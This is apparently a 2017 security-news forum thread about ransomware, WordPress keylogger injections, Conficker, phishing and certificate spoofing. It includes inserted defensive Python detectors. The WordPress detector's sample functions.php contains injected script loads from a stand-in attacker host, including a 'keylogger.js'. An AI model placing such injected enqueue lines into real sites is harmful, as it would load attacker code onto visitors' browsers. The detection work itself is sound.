bob3160
5541
If you have a Mac, you have a security problem.
Here’s how to fix it until Apple comes up with a patch.
https://www.howtogeek.com/334611/huge-macos-bug-allows-root-login-without-a-password.-heres-the-fix/
polonus
5542
bob3160
5543
New Shadow BTCware Ransomware Variant Released
A new variant of the BTCWare ransomware was discovered by Michael Gillespie, that appends the .[email]-id-id.shadow extension to encrypted files. The BTCWare family of ransomware infections targets its victims by hacking into poorly protected remote desktop services and manually installing the ransomware.
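The post says the BTCWare family gets in by hacking poorly protected remote desktop services. As an added example (not from the original post or from the BTCWare write-up), here is the detection logic a defender would run over Windows Security log records to catch that entry path: RDP logons are LogonType 10, failed logons are event 4625 and successful ones 4624. The log lines below are constructed and use a simplified key=value format (assumed here for readability, not the real EVTX/XML layout); the threshold and time window are assumptions to tune for the environment.

```python
"""Flag RDP password guessing (many 4625/LogonType 10 from one IP) and a
success (4624/LogonType 10) from the same IP after the burst."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample in a simplified key=value format (not real EVTX output).
SAMPLE_LOG = """\
2017-11-30T02:14:05 EventID=4625 LogonType=10 TargetUserName=administrator IpAddress=198.51.100.23
2017-11-30T02:14:09 EventID=4625 LogonType=10 TargetUserName=admin IpAddress=198.51.100.23
2017-11-30T02:14:13 EventID=4625 LogonType=10 TargetUserName=backup IpAddress=198.51.100.23
2017-11-30T02:14:18 EventID=4625 LogonType=10 TargetUserName=administrator IpAddress=198.51.100.23
2017-11-30T02:14:22 EventID=4625 LogonType=10 TargetUserName=administrator IpAddress=198.51.100.23
2017-11-30T02:15:01 EventID=4625 LogonType=3 TargetUserName=svc_sql IpAddress=203.0.113.7
2017-11-30T02:16:40 EventID=4625 LogonType=10 TargetUserName=administrator IpAddress=198.51.100.23
2017-11-30T02:16:55 EventID=4624 LogonType=10 TargetUserName=administrator IpAddress=198.51.100.23
2017-11-30T02:20:10 EventID=4625 LogonType=10 TargetUserName=jsmith IpAddress=203.0.113.7
2017-11-30T02:21:30 EventID=4625 LogonType=10 TargetUserName=jsmith IpAddress=203.0.113.7
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+EventID=(?P<eid>\d+)\s+LogonType=(?P<lt>\d+)\s+"
    r"TargetUserName=(?P<user>\S+)\s+IpAddress=(?P<ip>\S+)$"
)

RDP_LOGON_TYPE = 10          # RemoteInteractive (RDP)
EVENT_LOGON_FAILED = 4625
EVENT_LOGON_OK = 4624


def parse_events(log_text: str) -> List[dict]:
    """Parse the simplified log lines; skip anything that does not match."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.fromisoformat(m["ts"]),
            "eid": int(m["eid"]),
            "lt": int(m["lt"]),
            "user": m["user"],
            "ip": m["ip"],
        })
    return sorted(events, key=lambda e: e["ts"])


def detect_rdp_bruteforce(log_text: str, threshold: int = 5,
                          window: timedelta = timedelta(minutes=10)) -> Dict[str, dict]:
    """Return {source_ip: summary} for IPs with >= threshold RDP failures inside `window`.

    `success_after` is True when the same IP also has an RDP success at or after
    its last failure, i.e. the guessing most likely worked.
    """
    rdp = [e for e in parse_events(log_text) if e["lt"] == RDP_LOGON_TYPE]
    failures = defaultdict(list)
    for e in rdp:
        if e["eid"] == EVENT_LOGON_FAILED:
            failures[e["ip"]].append(e)

    alerts = {}
    for ip, fails in failures.items():
        # Sliding window: the most failures from this IP inside any `window`.
        best, j = 0, 0
        for i in range(len(fails)):
            while fails[i]["ts"] - fails[j]["ts"] > window:
                j += 1
            best = max(best, i - j + 1)
        if best < threshold:
            continue
        last_fail = fails[-1]["ts"]
        success_after = any(
            e["eid"] == EVENT_LOGON_OK and e["ip"] == ip and e["ts"] >= last_fail
            for e in rdp
        )
        alerts[ip] = {
            "failures": len(fails),
            "users": sorted({f["user"] for f in fails}),
            "success_after": success_after,
        }
    return alerts


if __name__ == "__main__":
    for ip, summary in detect_rdp_bruteforce(SAMPLE_LOG).items():
        print(ip, summary)
```

The LogonType filter matters: the 4625 with LogonType 3 in the sample is a network logon, not RDP, and is left out so that SMB or service-account noise does not inflate the count. The `success_after` flag is what turns a noisy "someone is guessing" alert into "go look at that host now".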
Asyn
5545
Pondus
5546
polonus
5547
forum.avast.com site’s nameserver configuration security issue:
Stealth name servers: Failed. Found name servers which are listed by the authoritative servers, but not by the parent ones:
ns6.avast.com at ns2.avast.com
sns.avast.com at ns2.avast.com
sns.avast.com at pns.avast.com
ns6.avast.com at pns.avast.com
Another issue:
Google Apps settings: Warning. The top-priority mail server is ASPMX.L.GOOGLE.com, but the TTL is not equal to the recommended value (86400).
On the cert:
Supported cipher suites: Warning. Your server supports suboptimal cipher suites:
DES-CBC3-SHA
Quotes above taken from a public scan at Threat Intelligence Platform for:
https://forum.avast.com
polonus (volunteer website security analyst and website error-hunter)
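The "stealth name server" finding quoted above comes from comparing two NS lists: the delegation the parent zone hands out, and the NS RRset each authoritative server itself returns. As an added example (my code, not part of the post or of the scanner it quotes), the check below reproduces that comparison in both directions, stealth servers (in the child's RRset, not in the parent's delegation) and lame delegations (in the parent's delegation, missing from a child server's RRset). The zone, server names and answers are constructed for the placeholder example.com so the code runs offline; the `dig` commands in the docstring are the usual way to collect the real inputs.

```python
"""Delegation consistency check: stealth name servers and lame delegations.

A scanner reports "<ns> at <server>" when authoritative server <server>
lists <ns> in its NS RRset but the parent zone's delegation does not.
Inputs are normally gathered with, for example:
  dig +short NS example.com @<a parent/TLD server>     (parent delegation)
  dig +short NS example.com @ns1.example.com           (each authoritative server)
Here they are constructed so the example runs without network access.
"""
from typing import Dict, Iterable, List, Tuple

# Constructed sample for the placeholder zone example.com (not a real scan).
PARENT_NS = ["ns1.example.com.", "ns2.example.com."]
CHILD_ANSWERS: Dict[str, Iterable[str]] = {
    "ns1.example.com": ["ns1.example.com.", "ns2.example.com.", "ns3.example.com."],
    "ns2.example.com": ["NS2.example.com.", "ns3.example.com.", "ns4.example.com."],
}


def _norm(name: str) -> str:
    """DNS names compare case-insensitively; the trailing root dot is ignored."""
    return name.strip().lower().rstrip(".")


def stealth_nameservers(parent_ns: Iterable[str],
                        child_answers: Dict[str, Iterable[str]]) -> List[Tuple[str, str]]:
    """(ns, reporting_server): listed by that authoritative server, not by the parent."""
    parent = {_norm(n) for n in parent_ns}
    findings = []
    for server in sorted(child_answers):
        for ns in sorted({_norm(n) for n in child_answers[server]} - parent):
            findings.append((ns, _norm(server)))
    return findings


def lame_delegations(parent_ns: Iterable[str],
                     child_answers: Dict[str, Iterable[str]]) -> List[Tuple[str, str]]:
    """(ns, reporting_server): delegated by the parent, missing from that server's NS RRset."""
    parent = {_norm(n) for n in parent_ns}
    findings = []
    for server in sorted(child_answers):
        for ns in sorted(parent - {_norm(n) for n in child_answers[server]}):
            findings.append((ns, _norm(server)))
    return findings


def format_report(parent_ns: Iterable[str],
                  child_answers: Dict[str, Iterable[str]]) -> List[str]:
    """Report lines in the same '<ns> at <server>' shape the quoted scan uses."""
    lines = [f"stealth: {ns} at {srv}" for ns, srv in stealth_nameservers(parent_ns, child_answers)]
    lines += [f"lame: {ns} at {srv}" for ns, srv in lame_delegations(parent_ns, child_answers)]
    return lines


if __name__ == "__main__":
    for line in format_report(PARENT_NS, CHILD_ANSWERS):
        print(line)
```

A clean delegation yields an empty report: every authoritative server returns exactly the set the parent delegates to. Resolvers that trust the child's NS RRset may still query a stealth server, so every server appearing in either list needs the same zone data and the same patch level, which is why a scanner treats the mismatch as a finding rather than a cosmetic issue.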
polonus
5548
Keylogger activity on thousands of hacked WordPress sites:
https://blog.sucuri.net/2017/12/cloudflare-solutions-keylogger-on-thousands-of-infected-wordpress-sites.html
polonus (volunteer website security analyst and website error-hunter)
P.S. Instructions for finding the malscript are in the Sucuri blog post linked above:
“The injected part of this malware didn’t change at all, using the theme’s functions.php to enqueue the following scripts to WordPress pages.”
Read on about the problem of bitcoin mining scripts and how avast will keep us secure:
https://blog.avast.com/avast-blocked-more-than-34-million-monero-cryptomining-attacks
(blog post credits: avast’s Denis Konopisky)
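The Sucuri write-up linked above describes the injection point: the theme's functions.php enqueuing attacker-hosted scripts on every page. As an added example (my code, not Sucuri's or the post's), here is a checker that pulls the URL literals out of wp_enqueue_script()/wp_register_script() calls and out of echoed `<script src=...>` tags in a functions.php and flags every host that is neither the site itself nor on an allowlist of known CDNs. The sample functions.php, the site host and the allowlist are constructed; the `evil-cdn.example` hostnames are placeholders, not the real campaign's domains.

```python
"""Flag off-site script sources in a WordPress theme's functions.php."""
import re
from typing import List, Optional
from urllib.parse import urlsplit

# Constructed sample: one legitimate relative enqueue, one allowlisted CDN,
# and three injected off-site scripts (placeholder hostnames).
SAMPLE_FUNCTIONS_PHP = r'''<?php
function theme_scripts() {
    wp_enqueue_script('theme-main', get_template_directory_uri() . '/js/main.js', array('jquery'), '1.0', true);
    wp_enqueue_script('theme-extra', '/wp-content/themes/t/js/extra.js');
    wp_enqueue_script('jquery-cdn', 'https://code.jquery.com/jquery-3.2.1.min.js');
    wp_enqueue_script('cf-font', '//evil-cdn.example/js/keylogger.js');
    wp_register_script('cf-track', "http://evil-cdn.example/assets/track.js", array(), null, true);
    wp_enqueue_script('cf-track');
}
add_action('wp_enqueue_scripts', 'theme_scripts');

function theme_footer_inject() {
    echo '<script type="text/javascript" src="https://evil-cdn.example/lib/fonts.js"></script>';
}
add_action('wp_footer', 'theme_footer_inject');
'''

SITE_HOST = "blog.example.org"                   # assumed: the site's own host
ALLOWED_HOSTS = {SITE_HOST, "code.jquery.com"}   # assumed allowlist of known CDNs

# wp_enqueue_script('handle', '<url>', ...) or wp_register_script('handle', "<url>", ...).
# Only string literals are matched; a URL built from an expression such as
# get_template_directory_uri() . '/js/main.js' is not a literal and must be reviewed by hand.
ENQUEUE_RE = re.compile(
    r"""wp_(?:enqueue|register)_script\s*\(\s*(['"])[^'"]*\1\s*,\s*(['"])([^'"]+)\2"""
)
# <script ... src="<url>"> emitted through echo/print.
SCRIPT_TAG_RE = re.compile(r"""<script\b[^>]*\bsrc\s*=\s*(['"])([^'"]+)\1""", re.I)


def extract_script_urls(php_source: str) -> List[str]:
    """Every script URL literal in the file, in order of appearance."""
    hits = [(m.start(), m.group(3)) for m in ENQUEUE_RE.finditer(php_source)]
    hits += [(m.start(), m.group(2)) for m in SCRIPT_TAG_RE.finditer(php_source)]
    return [url for _, url in sorted(hits)]


def host_of(url: str) -> Optional[str]:
    """Hostname of a script URL; None for a site-relative path."""
    if url.startswith("//"):          # protocol-relative URLs are common in injected code
        url = "https:" + url
    return urlsplit(url).hostname


def suspicious_script_urls(php_source: str, allowed_hosts=ALLOWED_HOSTS) -> List[str]:
    """URLs whose host is neither the site itself nor an allowlisted CDN."""
    flagged = []
    for url in extract_script_urls(php_source):
        host = host_of(url)
        if host is None:              # relative path: served by the site itself
            continue
        if host.lower() not in allowed_hosts:
            flagged.append(url)
    return flagged


if __name__ == "__main__":
    for url in suspicious_script_urls(SAMPLE_FUNCTIONS_PHP):
        print("off-site script:", url)
```

Run it against each active theme's functions.php (and any must-use plugins) after a compromise; an off-site host you did not put there is the enqueue the Sucuri post describes. Expression-built URLs and obfuscated strings (base64, string concatenation) are not caught by the regexes and need a manual look.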
polonus
5549
polonus
5550
Spyware inside printer software (weakly protected as usual)
is the royal way into your firm’s network for spies and sp**ks:
Re: https://zwclose.github.io/HP-keylogger/
When they are in your printer, they are inside your network.
With all the spyware added lately to all kinds of hardware,
it seems consumer rights are being violated on a grand scale everywhere,
and nobody seems to take your consumer rights seriously.
polonus
polonus
5551
Do not get it wrong. 25% of PHISHING websites now offer secure connections.
These certified websites (Comodo or Let’s Encrypt certification) have a green padlock,
so Mr. and Mrs. Average End-user will think such websites are safe. They are not!
They only have a secure connection to… unsafety!
Read: https://info.phishlabs.com/blog/quarter-phishing-attacks-hosted-https-domains
polonus
polonus
5552
To implement this with avast, we will have to untick “no scanning of trusted websites”
and have all websites scanned, trusted and untrusted alike.
Because in this case it could be a trusted phishing site (a contradictio in terminis)
that we tagged not to be scanned by avast. Capito? Always set it to scan all sites!
polonus
mchain
5553
Here is how to have avast scan all websites. See attached below.
As ‘Do not scan trusted websites’ is checked by default, in order to have avast scan all websites, including trusted ones, this box must be cleared and the check removed.
It should be noted that a clean install will always restore this setting to not scanning trusted websites, so it is one of the things that must be checked on a new install of avast if you do not want this behavior.
bob3160
5554
polonus
5555
Thank you, bob3160, for keeping everybody secure with this message,
together with your very clear picture and additional arrows,
that point in the right direction. ;D
Hope everybody stays safe that way.
Damian
Pondus
5556
CONFICKER / DOWNAD / DOWNADUP 9 Years After
http://blog.trendmicro.com/trendlabs-security-intelligence/conficker-downad-9-years-examining-impact-legacy-systems/
CVE-2008-4250 dominates our detections for vulnerabilities, with over 60,000 for the month of October 2017 alone.
All these clues paint a picture of the typical DOWNAD victim: organizations in key industries, typically from developing countries, that use outdated, unpatched legacy systems as an integral part of their network.
Conficker > https://en.wikipedia.org/wiki/Conficker
Until recently two versions of Conficker were still in F-Secure’s top 10 detections every 24 h.
VirusMap > http://worldmap3.f-secure.com/
polonus
5557
Hi Pondus,
According to Trend Micro, Conficker can be characterized as “background malware”, especially being active on legacy systems.
“Not quite as interesting to a larger audience as modern malware like WannaCry & Petya, it still is a persistent threat and will be so as long as no-longer-supported, unpatched legacy systems form part of corporate networks.”
polonus
polonus
5558
The problem with bogus EV SSL certificates has been demonstrated by a researcher:
Read: https://twitter.com/iangcarroll/status/940281927789146112
It cost the researcher under half an hour and 177 dollars to spoof the real extended validation certificate.
Is this a danger? And how!
More and more it is shown that online certification has the same problems
as all of the rest of the infrastructure: it is p*wned and holed from all sides around
to serve black hats and other sp**ks from your own government together with cybercriminals of all sorts.
If they wanna target you in person, you are birdfeed in no time,
and all the time the going gets narrower. ;D
>:(
polonus
Pondus
5559
bob3160
5560